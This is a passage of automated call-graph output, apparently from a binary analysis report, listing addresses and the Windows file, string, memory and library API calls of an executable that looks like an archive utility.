7ff64fe9d840 WideCharToMultiByte 38598 7ff64fe69157 38597->38598 38599 7ff64fe6916a 38598->38599 38600 7ff64fe691c4 38598->38600 38598->38604 38602 7ff64fe691ab 38599->38602 38603 7ff64fe6916f 38599->38603 38748 7ff64fe69338 12 API calls _handle_error 38600->38748 38747 7ff64fe6951c 71 API calls _handle_error 38602->38747 38603->38604 38733 7ff64fe698b0 38603->38733 38604->38594 38608 7ff64fe725a5 38607->38608 38613 7ff64fe7259e 38607->38613 38609 7ff64fe725ab GetStdHandle 38608->38609 38621 7ff64fe725ba 38608->38621 38609->38621 38610 7ff64fe72619 WriteFile 38610->38621 38611 7ff64fe725cf WriteFile 38612 7ff64fe7260b 38611->38612 38611->38621 38612->38611 38612->38621 38613->38318 38614 7ff64fe72658 GetLastError 38614->38621 38616 7ff64fe72684 SetLastError 38616->38621 38619 7ff64fe72721 38848 7ff64fe6cf14 10 API calls 38619->38848 38621->38610 38621->38611 38621->38613 38621->38614 38621->38619 38845 7ff64fe73144 9 API calls 2 library calls 38621->38845 38846 7ff64fe6cf34 10 API calls 38621->38846 38847 7ff64fe6c95c 126 API calls 38621->38847 38623 7ff64fe5161c 48 API calls 38622->38623 38624 7ff64fe5b719 38623->38624 38625 7ff64fe88d38 48 API calls 38624->38625 38625->38342 38626->38344 38627->38345 38628->38347 38630 7ff64fe89131 38629->38630 38633 7ff64fe88fcf 38629->38633 38630->38328 38631 7ff64fe890e0 38631->38630 38634 7ff64fe72574 126 API calls 38631->38634 38632 7ff64fe8905d 38632->38631 38635 7ff64fe5161c 48 API calls 38632->38635 38633->38632 38849 7ff64fe6ca6c 48 API calls 3 library calls 38633->38849 38634->38630 38635->38631 38637 7ff64fe8904c 38850 7ff64fe6ca40 61 API calls _CxxThrowException 38637->38850 38639->38353 38641 7ff64fe5b8f8 CharToOemA 38640->38641 38641->38362 38642->38357 38643->38363 38644->38365 38645->38367 38646->38369 38647->38373 38648->38374 38649->38377 38650->38383 38651->38385 38652->38388 38653->38386 38655 7ff64fe5161c 48 API calls 38654->38655 38656 7ff64fe5baf2 38655->38656 38656->38392 38656->38394 38656->38398 38657->38331 38658->38335 38659->38337 38660->38320 38662 7ff64fe7246a SetFilePointer 38661->38662 38663 7ff64fe72454 38661->38663 38664 7ff64fe724ad 38662->38664 38665 7ff64fe7248d GetLastError 38662->38665 38663->38664 38669 7ff64fe6cd00 10 API calls 38663->38669 38664->38472 38665->38664 38667 7ff64fe72497 38665->38667 38667->38664 38670 7ff64fe6cd00 10 API calls 38667->38670 38672 7ff64fe88efc 38671->38672 38673 7ff64fe88d00 48 API calls 38672->38673 38674 7ff64fe5ad24 38672->38674 38673->38672 38674->38509 38676 7ff64fe88eac 38675->38676 38677 7ff64fe88d00 48 API calls 38676->38677 38678 7ff64fe5b137 38676->38678 38677->38676 38678->38562 38679->38529 38680->38537 38681->38538 38682->38539 38683->38543 38684->38545 38685->38567 38686->38568 38687->38577 38688->38587 38689->38494 38691 7ff64fe872dd 38690->38691 38692 7ff64fe87304 38691->38692 38694 7ff64feaa480 38691->38694 38692->38587 38697 7ff64feaa444 38694->38697 38695 7ff64feaa47a 38695->38692 38697->38695 38700 7ff64feb36c0 38697->38700 38703 7ff64feab314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38697->38703 38704 7ff64feab2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38697->38704 38705 7ff64feb3700 38700->38705 38710 7ff64feb6938 EnterCriticalSection 38705->38710 38707 7ff64feb370d 38708 7ff64feb6998 abort LeaveCriticalSection 38707->38708 38709 7ff64feb36d2 38708->38709 38709->38697 38714 7ff64fe5161c 38711->38714 38713 7ff64fe5b601 38713->38318 38713->38320 38713->38591 38715 7ff64fe51640 38714->38715 38724 7ff64fe516aa memcpy_s 38714->38724 38716 7ff64fe5166d 38715->38716 38725 7ff64fe6ca6c 48 API calls 3 library calls 38715->38725 38717 7ff64fe5168e 38716->38717 38721 7ff64fe516d4 38716->38721 38717->38724 38727 7ff64fe6cb64 8 API calls 38717->38727 38719 7ff64fe51661 38726 7ff64fe6cb64 8 API calls 38719->38726 38721->38724 38728 7ff64fe6cb64 8 API calls 38721->38728 38724->38713 38725->38719 38730 7ff64fe69143 38729->38730 38731 7ff64fe97e95 38729->38731 38730->38597 38749 7ff64fe97ec8 38731->38749 38734 7ff64fe69b45 38733->38734 38738 7ff64fe69920 38733->38738 38735 7ff64feaa610 _handle_error 8 API calls 38734->38735 38736 7ff64fe69b61 38735->38736 38736->38604 38739 7ff64fe6996d 38738->38739 38740 7ff64fe69b75 38738->38740 38781 7ff64fe97da8 38738->38781 38739->38739 38788 7ff64fe6a0f4 38739->38788 38742 7ff64fe97f24 68 API calls 38740->38742 38744 7ff64fe69acb 38742->38744 38743 7ff64fe699d0 38743->38743 38804 7ff64fe97f24 38743->38804 38744->38734 38744->38744 38818 7ff64fe94ea8 8 API calls _handle_error 38744->38818 38747->38604 38748->38604 38750 7ff64fe97efa memcpy_s 38749->38750 38755 7ff64fe97fb5 38750->38755 38763 7ff64fe9b3f0 38750->38763 38753 7ff64fe9805c GetCurrentProcessId 38756 7ff64fe98034 38753->38756 38754 7ff64fe97f7e GetProcAddressForCaller GetProcAddress 38754->38755 38755->38753 38757 7ff64fe97ff1 38755->38757 38756->38730 38757->38756 38772 7ff64fe6ca6c 48 API calls 3 library calls 38757->38772 38759 7ff64fe9801f 38773 7ff64fe6cda4 10 API calls 2 library calls 38759->38773 38761 7ff64fe98027 38774 7ff64fe6ca40 61 API calls _CxxThrowException 38761->38774 38775 7ff64feaa5a0 38763->38775 38766 7ff64fe9b42c 38777 7ff64fe848bc 38766->38777 38767 7ff64fe9b428 38770 7ff64feaa610 _handle_error 8 API calls 38767->38770 38771 7ff64fe97f72 38770->38771 38771->38754 38771->38755 38772->38759 38773->38761 38774->38756 38776 7ff64fe9b3fc GetSystemDirectoryW 38775->38776 38776->38766 38776->38767 38778 7ff64fe848cb pre_c_initialization 38777->38778 38779 7ff64feaa610 _handle_error 8 API calls 38778->38779 38780 7ff64fe8493a LoadLibraryExW 38779->38780 38780->38767 38782 7ff64fe97e74 68 API calls 38781->38782 38783 7ff64fe97ddc 38782->38783 38784 7ff64fe97e74 68 API calls 38783->38784 38785 7ff64fe97def 38784->38785 38786 7ff64feaa610 _handle_error 8 API calls 38785->38786 38787 7ff64fe97e43 38786->38787 38787->38738 38791 7ff64fe6a15c memcpy_s 38788->38791 38789 7ff64fe6a358 38841 7ff64feaa774 8 API calls __report_securityfailure 38789->38841 38791->38789 38792 7ff64fe6a352 38791->38792 38795 7ff64fe6a34d 38791->38795 38796 7ff64fe6a192 38791->38796 38840 7ff64feaa774 8 API calls __report_securityfailure 38792->38840 38794 7ff64fe6a35e 38839 7ff64feaa774 8 API calls __report_securityfailure 38795->38839 38819 7ff64fe69dd8 38796->38819 38799 7ff64fe69dd8 8 API calls 38800 7ff64fe6a1d9 38799->38800 38800->38799 38801 7ff64fe6a2f1 38800->38801 38802 7ff64feaa610 _handle_error 8 API calls 38801->38802 38803 7ff64fe6a33b 38802->38803 38803->38743 38805 7ff64fe97f5e 38804->38805 38810 7ff64fe97fb5 38804->38810 38806 7ff64fe9b3f0 10 API calls 38805->38806 38805->38810 38807 7ff64fe97f72 38806->38807 38809 7ff64fe97f7e GetProcAddressForCaller GetProcAddress 38807->38809 38807->38810 38808 7ff64fe9805c GetCurrentProcessId 38817 7ff64fe98034 38808->38817 38809->38810 38810->38808 38811 7ff64fe97ff1 38810->38811 38811->38817 38842 7ff64fe6ca6c 48 API calls 3 library calls 38811->38842 38813 7ff64fe9801f 38843 7ff64fe6cda4 10 API calls 2 library calls 38813->38843 38815 7ff64fe98027 38844 7ff64fe6ca40 61 API calls _CxxThrowException 38815->38844 38817->38744 38818->38734 38820 7ff64fe69e46 38819->38820 38825 7ff64fe69e6e __scrt_fastfail 38819->38825 38821 7ff64fe99ce4 8 API calls 38820->38821 38822 7ff64fe69e5e 38821->38822 38826 7ff64fe99b70 8 API calls 38822->38826 38823 7ff64fe69e85 38824 7ff64fe99ce4 8 API calls 38823->38824 38827 7ff64fe69f97 38824->38827 38825->38823 38828 7ff64fe99ce4 8 API calls 38825->38828 38826->38825 38829 7ff64fe99b70 8 API calls 38827->38829 38828->38823 38830 7ff64fe69fa8 __scrt_fastfail 38829->38830 38831 7ff64fe69fb4 38830->38831 38833 7ff64fe99ce4 8 API calls 38830->38833 38832 7ff64fe99ce4 8 API calls 38831->38832 38834 7ff64fe6a0bb 38832->38834 38833->38831 38835 7ff64fe99b70 8 API calls 38834->38835 38836 7ff64fe6a0c9 38835->38836 38837 7ff64feaa610 _handle_error 8 API calls 38836->38837 38838 7ff64fe6a0d8 38837->38838 38838->38800 38839->38792 38840->38789 38841->38794 38842->38813 38843->38815 38844->38817 38845->38616 38847->38621 38849->38637 38850->38632 38853->38426 38854 7ff64fe9bb70 38857 7ff64fe9bb80 38854->38857 38866 7ff64fe9bae8 38857->38866 38859 7ff64fe9bb97 38860 7ff64fe9bb79 38859->38860 38871 7ff64fe61690 38859->38871 38862 7ff64fe9bbd5 LeaveCriticalSection 38864 7ff64fe9bae8 67 API calls 38862->38864 38863 7ff64fe9bbc8 SetEvent 38863->38862 38864->38859 38875 7ff64fe9b974 WaitForSingleObject 38866->38875 38869 7ff64fe9bb12 38869->38859 38870 7ff64fe9bb16 EnterCriticalSection LeaveCriticalSection 38870->38869 38872 7ff64fe616c2 EnterCriticalSection 38871->38872 38873 7ff64fe616a4 38871->38873 38872->38862 38872->38863 38873->38872 38883 7ff64fe61180 38873->38883 38876 7ff64fe9b9b7 38875->38876 38877 7ff64fe9b986 GetLastError 38875->38877 38876->38869 38876->38870 38881 7ff64fe6ca6c 48 API calls 3 library calls 38877->38881 38879 7ff64fe9b9a6 38882 7ff64fe6ca40 61 API calls _CxxThrowException 38879->38882 38881->38879 38882->38876 38884 7ff64fe611ab 38883->38884 38889 7ff64fe611b0 38883->38889 38893 7ff64fe617c8 216 API calls 2 library calls 38884->38893 38885 7ff64fe6166a 38885->38873 38887 7ff64fe86d38 216 API calls 38887->38889 38888 7ff64fe61080 48 API calls 38888->38889 38889->38885 38889->38887 38889->38888 38890 7ff64fe86e90 216 API calls 38889->38890 38891 7ff64fe86fe8 216 API calls 38889->38891 38894 7ff64fe617c8 216 API calls 2 library calls 38889->38894 38890->38889 38891->38889 38893->38889 38894->38889 38895 7ff64feb9c74 38896 7ff64feb9c7c 38895->38896 38897 7ff64feb9cbb 38896->38897 38899 7ff64feb9cac 38896->38899 38898 7ff64feb9cc5 38897->38898 38917 7ff64febce08 32 API calls 2 library calls 38897->38917 38904 7ff64feb4b8c 38898->38904 38916 7ff64feb4f3c 15 API calls _invalid_parameter_noinfo 38899->38916 38903 7ff64feb9cb1 __scrt_fastfail 38905 7ff64feb4ba1 38904->38905 38906 7ff64feb4bab 38904->38906 38918 7ff64feb4ab4 38905->38918 38908 7ff64feb4bb0 38906->38908 38914 7ff64feb4bb7 __vcrt_getptd_noexit 38906->38914 38909 7ff64feb4a74 __free_lconv_num 15 API calls 38908->38909 38911 7ff64feb4ba9 38909->38911 38910 7ff64feb4bf6 38925 7ff64feb4f3c 15 API calls _invalid_parameter_noinfo 38910->38925 38911->38903 38912 7ff64feb4be0 RtlReAllocateHeap 38912->38911 38912->38914 38914->38910 38914->38912 38915 7ff64feb36c0 new 2 API calls 38914->38915 38915->38914 38916->38903 38917->38898 38919 7ff64feb4aff 38918->38919 38923 7ff64feb4ac3 __vcrt_getptd_noexit 38918->38923 38926 7ff64feb4f3c 15 API calls _invalid_parameter_noinfo 38919->38926 38920 7ff64feb4ae6 RtlAllocateHeap 38922 7ff64feb4afd 38920->38922 38920->38923 38922->38911 38923->38919 38923->38920 38924 7ff64feb36c0 new 2 API calls 38923->38924 38924->38923 38925->38911 38926->38922 38927 7ff64fe9a924 38928 7ff64fe9a949 sprintf 38927->38928 38929 7ff64fe9a97f CompareStringA 38928->38929 38930 7ff64fe53b53 38931 7ff64fe53b64 38930->38931 38980 7ff64fe71e80 38931->38980 38933 7ff64fe53bb6 38934 7ff64fe53c18 38933->38934 38936 7ff64fe53c01 38933->38936 38940 7ff64fe53c09 38933->38940 39002 7ff64fe58050 157 API calls 38934->39002 38935 7ff64fe53ccc 38962 7ff64fe53c90 38935->38962 39010 7ff64fe72414 61 API calls 38935->39010 38997 7ff64fe71c24 38936->38997 38939 7ff64fe53c3d 39003 7ff64fe58010 13 API calls 38939->39003 38992 7ff64fe723f0 38940->38992 38944 7ff64fe53c45 38945 7ff64fe53c54 38944->38945 39004 7ff64fe6cba8 75 API calls 38944->39004 39005 7ff64fe5a9d4 186 API calls wcschr 38945->39005 38946 7ff64fe53cf9 39011 7ff64fe71998 138 API calls 38946->39011 38950 7ff64fe53c5c 39006 7ff64fe593ac 8 API calls 38950->39006 38951 7ff64fe53d10 39012 7ff64fe718ac 38951->39012 38954 7ff64fe53c66 38956 7ff64fe53c77 38954->38956 39007 7ff64fe6ca40 61 API calls _CxxThrowException 38954->39007 39008 7ff64fe58090 8 API calls 38956->39008 38959 7ff64fe53c7f 38959->38962 39009 7ff64fe6ca40 61 API calls _CxxThrowException 38959->39009 39019 7ff64fe9d400 48 API calls 38962->39019 38982 7ff64fe71e95 pre_c_initialization 38980->38982 38981 7ff64fe71ecb CreateFileW 38983 7ff64fe71f59 GetLastError 38981->38983 38989 7ff64fe71fb8 38981->38989 38982->38981 39020 7ff64fe84534 38983->39020 38986 7ff64fe71fd9 SetFileTime 38987 7ff64fe71ff7 38986->38987 38988 7ff64feaa610 _handle_error 8 API calls 38987->38988 38991 7ff64fe7203a 38988->38991 38989->38986 38989->38987 38990 7ff64fe71f78 CreateFileW GetLastError 38990->38989 38991->38933 39035 7ff64fe724e8 38992->39035 38995 7ff64fe7240e 38995->38935 38998 7ff64fe71c3b 38997->38998 38999 7ff64fe71c37 38997->38999 38998->38999 39000 7ff64fe71c5d 38998->39000 38999->38940 39052 7ff64fe72d6c 12 API calls 2 library calls 39000->39052 39002->38939 39003->38944 39005->38950 39006->38954 39007->38956 39008->38959 39009->38962 39010->38946 39011->38951 39013 7ff64fe718db 39012->39013 39014 7ff64fe718ca 39012->39014 39013->38962 39014->39013 39015 7ff64fe718d6 39014->39015 39016 7ff64fe718de 39014->39016 39017 7ff64fe71c24 12 API calls 39015->39017 39053 7ff64fe71930 39016->39053 39017->39013 39021 7ff64fe84549 pre_c_initialization 39020->39021 39031 7ff64fe845a2 39021->39031 39032 7ff64fe8472c CharUpperW 39021->39032 39023 7ff64feaa610 _handle_error 8 API calls 39025 7ff64fe71f74 39023->39025 39024 7ff64fe84579 39033 7ff64fe84760 CharUpperW 39024->39033 39025->38989 39025->38990 39027 7ff64fe84592 39028 7ff64fe8459a 39027->39028 39029 7ff64fe84629 GetCurrentDirectoryW 39027->39029 39034 7ff64fe8472c CharUpperW 39028->39034 39029->39031 39031->39023 39032->39024 39033->39027 39034->39031 39041 7ff64fe71af0 39035->39041 39038 7ff64fe723f9 39038->38995 39040 7ff64fe6ca40 61 API calls _CxxThrowException 39038->39040 39040->38995 39042 7ff64fe71b01 pre_c_initialization 39041->39042 39043 7ff64fe71b6f CreateFileW 39042->39043 39044 7ff64fe71b68 39042->39044 39043->39044 39045 7ff64fe71be1 39044->39045 39046 7ff64fe84534 10 API calls 39044->39046 39049 7ff64feaa610 _handle_error 8 API calls 39045->39049 39047 7ff64fe71bb3 39046->39047 39047->39045 39048 7ff64fe71bb7 CreateFileW 39047->39048 39048->39045 39050 7ff64fe71c14 39049->39050 39050->39038 39051 7ff64fe6ca08 10 API calls 39050->39051 39051->39038 39052->38999 39054 7ff64fe7194c 39053->39054 39057 7ff64fe71964 39053->39057 39056 7ff64fe71958 CloseHandle 39054->39056 39054->39057 39055 7ff64fe71988 39055->39013 39056->39057 39057->39055 39059 7ff64fe6c9d0 10 API calls 39057->39059 39059->39055 39060 7ff64fe51884 39192 7ff64fe834e4 39060->39192 39063 7ff64fe834e4 CompareStringW 39065 7ff64fe518a6 39063->39065 39064 7ff64fe51926 39066 7ff64fe5195b 39064->39066 39256 7ff64fe83f98 63 API calls 2 library calls 39064->39256 39068 7ff64fe834e4 CompareStringW 39065->39068 39074 7ff64fe518b9 39065->39074 39072 7ff64fe51970 39066->39072 39257 7ff64fe72ed8 100 API calls 3 library calls 39066->39257 39068->39074 39071 7ff64fe51915 39255 7ff64fe6ca40 61 API calls _CxxThrowException 39071->39255 39075 7ff64fe519b8 39072->39075 39258 7ff64fe949f4 48 API calls 39072->39258 39074->39064 39254 7ff64fe51168 8 API calls 2 library calls 39074->39254 39196 7ff64fe55450 39075->39196 39077 7ff64fe519b0 39259 7ff64fe68444 54 API calls fflush 39077->39259 39083 7ff64fe572c4 76 API calls 39090 7ff64fe51a12 39083->39090 39084 7ff64fe51ae6 39230 7ff64fe57514 39084->39230 39085 7ff64fe51b04 39234 7ff64fe66c94 39085->39234 39088 7ff64fe51af2 39089 7ff64fe57514 72 API calls 39088->39089 39091 7ff64fe51aff 39089->39091 39090->39084 39090->39085 39092 7ff64feaa610 _handle_error 8 API calls 39091->39092 39093 7ff64fe52f97 39092->39093 39094 7ff64fe51b13 39250 7ff64fe57148 39094->39250 39096 7ff64fe51c71 39097 7ff64fe51ca7 39096->39097 39098 7ff64fe563e8 8 API calls 39096->39098 39099 7ff64fe51ce4 39097->39099 39100 7ff64fe51cd5 39097->39100 39101 7ff64fe51c91 39098->39101 39102 7ff64feaa444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39099->39102 39104 7ff64feaa444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39100->39104 39103 7ff64fe549b8 99 API calls 39101->39103 39108 7ff64fe51cee 39102->39108 39105 7ff64fe51c9d 39103->39105 39104->39108 39106 7ff64fe563e8 8 API calls 39105->39106 39106->39097 39107 7ff64fe51d50 39110 7ff64feaa444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39107->39110 39108->39107 39109 7ff64fe9de30 72 API calls 39108->39109 39109->39107 39111 7ff64fe51d62 39110->39111 39112 7ff64fe9dbd0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39111->39112 39113 7ff64fe51d7b 39111->39113 39112->39113 39114 7ff64fea2bcc 66 API calls 39113->39114 39115 7ff64fe51dba 39114->39115 39187 7ff64fe7ae10 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39115->39187 39116 7ff64fe51e1c 39118 7ff64fe510c0 8 API calls 39116->39118 39120 7ff64fe51e5d 39116->39120 39117 7ff64fe51dde std::bad_alloc::bad_alloc 39117->39116 39119 7ff64feaba34 _CxxThrowException RtlPcToFileHeader RaiseException 39117->39119 39118->39120 39119->39116 39121 7ff64fe5a410 159 API calls 39120->39121 39186 7ff64fe51ef4 39120->39186 39121->39186 39122 7ff64fe52d0c 39124 7ff64fe9de30 72 API calls 39122->39124 39133 7ff64fe52d21 39122->39133 39123 7ff64fe52ccc 39123->39122 39191 7ff64fe78c80 72 API calls 39123->39191 39124->39133 39125 7ff64fe52d86 39130 7ff64fe949f4 48 API calls 39125->39130 39168 7ff64fe52dd0 39125->39168 39126 7ff64fe949f4 48 API calls 39184 7ff64fe52005 39126->39184 39127 7ff64fe76688 48 API calls 39127->39186 39128 7ff64fe9b6d0 73 API calls 39128->39184 39129 7ff64fe55e70 169 API calls 39129->39184 39134 7ff64fe52d9e 39130->39134 39131 7ff64fe5a504 208 API calls 39131->39168 39132 7ff64fe580e4 192 API calls 39132->39168 39133->39125 39135 7ff64fe949f4 48 API calls 39133->39135 39138 7ff64fe68444 54 API calls 39134->39138 39140 7ff64fe52d6c 39135->39140 39136 7ff64fe55928 237 API calls 39136->39184 39137 7ff64fe5e6c8 157 API calls 39137->39186 39142 7ff64fe52da6 39138->39142 39139 7ff64fe77c7c 127 API calls 39139->39168 39143 7ff64fe949f4 48 API calls 39140->39143 39141 7ff64fe5a410 159 API calls 39141->39186 39150 7ff64fe71c24 12 API calls 39142->39150 39147 7ff64fe52d79 39143->39147 39144 7ff64fe6e21c 63 API calls 39144->39184 39145 7ff64fe51168 8 API calls 39145->39168 39146 7ff64fe5b540 147 API calls 39146->39186 39148 7ff64fe68444 54 API calls 39147->39148 39148->39125 39149 7ff64fe765b4 48 API calls 39149->39186 39150->39168 39151 7ff64fe5a4d0 12 API calls 39151->39186 39152 7ff64fe74554 16 API calls 39152->39186 39153 7ff64fe71998 138 API calls 39153->39186 39154 7ff64fe9ae50 71 API calls 39157 7ff64fe52e39 39154->39157 39155 7ff64fe533b4 64 API calls 39155->39168 39156 7ff64fe55db4 46 API calls 39156->39186 39157->39154 39158 7ff64fe6ca40 61 API calls 39157->39158 39157->39168 39158->39168 39159 7ff64fe56188 231 API calls 39159->39168 39160 7ff64fe71e80 15 API calls 39160->39186 39161 7ff64fe77c7c 127 API calls 39161->39186 39162 7ff64fe71930 11 API calls 39162->39186 39163 7ff64fe53f74 138 API calls 39163->39168 39164 7ff64fe5b540 147 API calls 39164->39184 39165 7ff64fe6cbd0 75 API calls 39165->39186 39166 7ff64fe949f4 48 API calls 39166->39168 39167 7ff64fe8ba9c 195 API calls 39167->39168 39168->39131 39168->39132 39168->39139 39168->39145 39168->39155 39168->39157 39168->39159 39168->39163 39168->39166 39168->39167 39170 7ff64fe68444 54 API calls 39168->39170 39169 7ff64fe55004 49 API calls 39169->39186 39170->39168 39171 7ff64fe5571c 12 API calls 39171->39186 39172 7ff64fe718ac 15 API calls 39172->39186 39173 7ff64fe51168 8 API calls 39173->39186 39174 7ff64fe9d48c 58 API calls 39174->39186 39175 7ff64fe55e70 169 API calls 39175->39186 39176 7ff64fe69be0 14 API calls 39176->39186 39177 7ff64fe9c0a8 10 API calls 39177->39186 39178 7ff64fe76378 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39178->39186 39179 7ff64fe897f0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 39179->39186 39180 7ff64fe75c0c 237 API calls 39180->39186 39181 7ff64fe75d40 237 API calls 39181->39186 39182 7ff64fe56114 216 API calls 39182->39186 39183 7ff64fe75708 237 API calls 39183->39186 39184->39126 39184->39128 39184->39129 39184->39136 39184->39144 39184->39164 39185 7ff64fe68444 54 API calls 39184->39185 39184->39186 39185->39184 39186->39123 39186->39127 39186->39137 39186->39141 39186->39146 39186->39149 39186->39151 39186->39152 39186->39153 39186->39156 39186->39160 39186->39161 39186->39162 39186->39165 39186->39169 39186->39171 39186->39172 39186->39173 39186->39174 39186->39175 39186->39176 39186->39177 39186->39178 39186->39179 39186->39180 39186->39181 39186->39182 39186->39183 39186->39184 39188 7ff64fe7a250 237 API calls 39186->39188 39189 7ff64fe7aae0 237 API calls 39186->39189 39190 7ff64fe60d60 237 API calls 39186->39190 39187->39117 39188->39186 39189->39184 39190->39184 39191->39122 39193 7ff64fe834f6 39192->39193 39194 7ff64fe51893 39193->39194 39260 7ff64fe9dac0 CompareStringW 39193->39260 39194->39063 39194->39074 39197 7ff64fe5546f pre_c_initialization 39196->39197 39198 7ff64fe5554a __scrt_fastfail 39197->39198 39214 7ff64fe55588 __scrt_fastfail 39197->39214 39201 7ff64fe9c0a8 10 API calls 39198->39201 39200 7ff64fe55583 39290 7ff64fe56eb8 39200->39290 39202 7ff64fe55576 39201->39202 39205 7ff64fe5681c 54 API calls 39202->39205 39205->39200 39206 7ff64fe556e9 39297 7ff64fe96f68 39206->39297 39208 7ff64fe556f6 39209 7ff64feaa610 _handle_error 8 API calls 39208->39209 39210 7ff64fe519df 39209->39210 39216 7ff64fe572c4 39210->39216 39214->39200 39261 7ff64fe53210 39214->39261 39267 7ff64fe67088 39214->39267 39271 7ff64fe5681c 39214->39271 39282 7ff64fe97a24 39214->39282 39301 7ff64fe5571c 39214->39301 39309 7ff64fe64380 14 API calls 39214->39309 39217 7ff64fe572eb 39216->39217 39404 7ff64fe688dc 39217->39404 39219 7ff64fe57302 39408 7ff64fe8915c 39219->39408 39221 7ff64fe5730f 39420 7ff64fe87044 39221->39420 39224 7ff64feaa444 new 4 API calls 39225 7ff64fe573e3 39224->39225 39226 7ff64fe573f5 __scrt_fastfail 39225->39226 39425 7ff64fe7894c 39225->39425 39228 7ff64fe69be0 14 API calls 39226->39228 39229 7ff64fe51a01 39228->39229 39229->39083 39231 7ff64fe57539 39230->39231 39451 7ff64fe8922c 39231->39451 39235 7ff64fe66d45 39234->39235 39238 7ff64fe66cbc 39234->39238 39236 7ff64fe66d83 39235->39236 39239 7ff64fe66d69 39235->39239 39467 7ff64fe89f78 8 API calls 2 library calls 39235->39467 39236->39094 39237 7ff64fe66cd9 39241 7ff64fe66cf3 39237->39241 39463 7ff64fe89f78 8 API calls 2 library calls 39237->39463 39238->39237 39462 7ff64fe89f78 8 API calls 2 library calls 39238->39462 39239->39236 39468 7ff64fe89f78 8 API calls 2 library calls 39239->39468 39244 7ff64fe66d0d 39241->39244 39464 7ff64fe89f78 8 API calls 2 library calls 39241->39464 39247 7ff64fe66d2b 39244->39247 39465 7ff64fe89f78 8 API calls 2 library calls 39244->39465 39247->39236 39466 7ff64fe89f78 8 API calls 2 library calls 39247->39466 39251 7ff64fe57167 39250->39251 39252 7ff64fe57162 39250->39252 39469 7ff64fe56c64 130 API calls _handle_error 39252->39469 39254->39071 39255->39064 39256->39066 39257->39072 39258->39077 39259->39075 39260->39194 39262 7ff64fe532e9 39261->39262 39263 7ff64fe53231 39261->39263 39262->39214 39263->39262 39310 7ff64fe64380 14 API calls 39263->39310 39265 7ff64fe5329c 39265->39262 39311 7ff64fe72a20 22 API calls 2 library calls 39265->39311 39268 7ff64fe670a4 39267->39268 39270 7ff64fe670c5 39268->39270 39312 7ff64fe78558 10 API calls 2 library calls 39268->39312 39270->39214 39313 7ff64fe56714 39271->39313 39273 7ff64fe56836 39274 7ff64fe56853 39273->39274 39324 7ff64feb48c0 31 API calls _invalid_parameter_noinfo 39273->39324 39274->39214 39276 7ff64fe5684b 39276->39274 39277 7ff64fe568a9 std::bad_alloc::bad_alloc 39276->39277 39325 7ff64feaba34 RtlPcToFileHeader RaiseException 39277->39325 39279 7ff64fe568c4 39326 7ff64fe57188 12 API calls 39279->39326 39281 7ff64fe568eb 39281->39214 39283 7ff64fe97a4f 39282->39283 39288 7ff64fe97a59 39282->39288 39283->39214 39284 7ff64fe97a7c 39363 7ff64fe9b6d0 73 API calls _Init_thread_footer 39284->39363 39287 7ff64fe97b1c 60 API calls 39287->39288 39288->39283 39288->39284 39288->39287 39331 7ff64fe971fc 39288->39331 39364 7ff64fe641b0 14 API calls 2 library calls 39288->39364 39291 7ff64fe56ee6 39290->39291 39296 7ff64fe56f5c 39290->39296 39397 7ff64fe99f64 8 API calls memcpy_s 39291->39397 39293 7ff64fe56efb 39294 7ff64fe56f2f 39293->39294 39293->39296 39294->39293 39398 7ff64fe57188 12 API calls 39294->39398 39296->39206 39298 7ff64fe96fb4 39297->39298 39300 7ff64fe96f8a 39297->39300 39299 7ff64fe74538 FindClose 39299->39300 39300->39298 39300->39299 39302 7ff64fe55742 39301->39302 39307 7ff64fe5575d 39301->39307 39302->39307 39403 7ff64fe83520 12 API calls 2 library calls 39302->39403 39306 7ff64fe557fc 39306->39214 39399 7ff64fe83610 39307->39399 39308 7ff64fe848bc 8 API calls 39308->39306 39309->39214 39310->39265 39311->39262 39312->39268 39314 7ff64fe56738 39313->39314 39323 7ff64fe567a7 memcpy_s 39313->39323 39315 7ff64fe56765 39314->39315 39327 7ff64fe6ca6c 48 API calls 3 library calls 39314->39327 39319 7ff64fe567e1 39315->39319 39320 7ff64fe56786 39315->39320 39317 7ff64fe56759 39328 7ff64fe6cb64 8 API calls 39317->39328 39319->39323 39330 7ff64fe6cb64 8 API calls 39319->39330 39320->39323 39329 7ff64fe6cb64 8 API calls 39320->39329 39323->39273 39324->39276 39325->39279 39326->39281 39327->39317 39336 7ff64fe97217 pre_c_initialization 39331->39336 39332 7ff64feaa610 _handle_error 8 API calls 39334 7ff64fe9776f 39332->39334 39334->39288 39347 7ff64fe9725a 39336->39347 39348 7ff64fe9729c 39336->39348 39360 7ff64fe973c5 39336->39360 39372 7ff64fe74554 39336->39372 39337 7ff64fe97453 39340 7ff64fe97464 39337->39340 39341 7ff64fe97476 39337->39341 39339 7ff64fe976ef 39339->39347 39383 7ff64fe78558 10 API calls 2 library calls 39339->39383 39380 7ff64fe97c38 55 API calls 3 library calls 39340->39380 39355 7ff64fe97496 39341->39355 39369 7ff64fe74538 39341->39369 39343 7ff64fe97342 39343->39339 39343->39347 39353 7ff64fe97656 39343->39353 39381 7ff64fe64380 14 API calls 39343->39381 39344 7ff64fe97471 39344->39341 39347->39332 39349 7ff64fe973bb 39348->39349 39351 7ff64fe9732e 39348->39351 39352 7ff64feaa444 new 4 API calls 39349->39352 39351->39343 39354 7ff64fe9734a 39351->39354 39352->39360 39353->39339 39353->39347 39361 7ff64fe97723 39353->39361 39354->39347 39356 7ff64fe9737e 39354->39356 39378 7ff64fe64380 14 API calls 39354->39378 39355->39347 39357 7ff64fe74554 16 API calls 39355->39357 39356->39347 39379 7ff64fe6cbd0 75 API calls 39356->39379 39357->39347 39365 7ff64fe745cc 39360->39365 39382 7ff64fe5c214 8 API calls 2 library calls 39361->39382 39364->39288 39367 7ff64fe745ed 39365->39367 39366 7ff64fe746ec 15 API calls 39366->39367 39367->39366 39368 7ff64fe746b2 39367->39368 39368->39337 39368->39343 39370 7ff64fe74549 FindClose 39369->39370 39371 7ff64fe7454f 39369->39371 39370->39371 39371->39355 39373 7ff64fe74570 